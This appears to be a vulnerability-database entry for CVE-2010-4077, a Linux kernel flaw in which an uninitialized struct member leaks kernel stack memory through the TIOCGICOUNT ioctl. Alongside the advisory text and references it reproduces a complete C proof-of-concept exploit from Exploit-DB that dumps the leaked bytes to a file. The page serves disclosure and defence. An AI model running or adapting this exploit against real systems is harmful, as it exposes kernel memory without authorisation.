CVE-2010-4077
Description
The ntty_ioctl_tiocgicount function in drivers/char/nozomi.c in the Linux kernel 2.6.36.1 and earlier does not properly initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel stack memory via a TIOCGICOUNT ioctl call.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak
/* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak
* ================================================
* Information leak exploit for CVE-2010-4077 which
* leaks kernel stack space back to userland due to
* uninitialized struct member "reserved" in struct
* serial_icounter_struct copied to userland. uses
* ioctl to trigger memory leak, dumps to file and
* displays to command line.
*
* -- prdelka
*
*/
#include <termios.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/serial.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char* argv[]) {
int fd, ret = 0, i;
struct serial_icounter_struct buffer;
printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");
if(argc < 2){
printf("[ You need to supply a device name e.g. /dev/ttyS0\n");
exit(-1);
};
memset(&buffer,0,sizeof(buffer));
if((fd = open(argv[1], O_RDONLY)) == -1){
printf("[ Couldn't open %s\n",argv[1]);
exit(-1);
}
if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){
printf("[ Problem with ioctl() request\n");
exit(-1);
}
close(fd);
for(i=0;i<=9;i++){
printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);
};
if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){
printf("[ Can't open file to write memory out\n");
exit(-1);
}
for(i=0;i<=9;i++){
ret += write(fd,&buffer.reserved[i],sizeof(int));
}
close(fd);
printf("[ Written %d leaked bytes to ./leak\n",ret);
exit(0);
}OS impact
Linux kernel Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| โ | Affected | โ |
References
- http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=d281da7ff6f70efca0553c288bb883e8605b3862
- http://lkml.indiana.edu/hypermail//linux/kernel/1009.1/03387.html
- http://secunia.com/advisories/42890
- http://securityreason.com/securityalert/8129
- http://www.openwall.com/lists/oss-security/2010/09/25/2
- http://www.openwall.com/lists/oss-security/2010/10/06/6
- http://www.openwall.com/lists/oss-security/2010/10/07/1
- http://www.openwall.com/lists/oss-security/2010/10/25/3
- http://www.redhat.com/support/errata/RHSA-2010-0958.html
- http://www.redhat.com/support/errata/RHSA-2011-0007.html
- http://www.securityfocus.com/bid/45059
- https://bugzilla.redhat.com/show_bug.cgi?id=648663
- http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=d281da7ff6f70efca0553c288bb883e8605b3862
- http://lkml.indiana.edu/hypermail//linux/kernel/1009.1/03387.html
- http://secunia.com/advisories/42890
- http://securityreason.com/securityalert/8129
- http://www.openwall.com/lists/oss-security/2010/09/25/2
- http://www.openwall.com/lists/oss-security/2010/10/06/6
- http://www.openwall.com/lists/oss-security/2010/10/07/1
- http://www.openwall.com/lists/oss-security/2010/10/25/3
- http://www.redhat.com/support/errata/RHSA-2010-0958.html
- http://www.redhat.com/support/errata/RHSA-2011-0007.html
- http://www.securityfocus.com/bid/45059
- https://bugzilla.redhat.com/show_bug.cgi?id=648663
CWEs
CWE-200
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.